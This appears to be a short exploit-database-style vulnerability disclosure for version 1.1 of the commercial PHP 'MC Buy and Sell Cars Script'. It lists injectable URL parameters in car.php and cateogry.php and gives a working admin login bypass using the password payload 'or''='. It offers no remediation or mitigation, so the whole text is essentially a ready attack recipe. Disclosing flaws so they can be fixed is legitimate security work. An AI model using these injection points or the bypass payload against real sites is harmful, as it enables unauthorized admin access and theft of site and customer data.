# # # # # # Vulnerability: SQL Injection Web Vulnerability # Date: 15.01.2017 # Vendor Homepage: http://microcode.ws/ # Script Name: MC Buy and Sell Cars Script # Script Version: V1.1 # Script Buy Now: http://microcode.ws/product/mc-buy-and-sell-cars-php-script/3878 # Author: Adeghsan Aencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/car.php?c=[SQL] # http://localhost/[PATH]/car.php?c=[Permalink]&id=[SQL] # http://localhost/[PATH]/cateogry.php?p=search&cage=all&manufacturer=[SQL] # E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well. # # Admin Login Bypass # http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter. # # # # #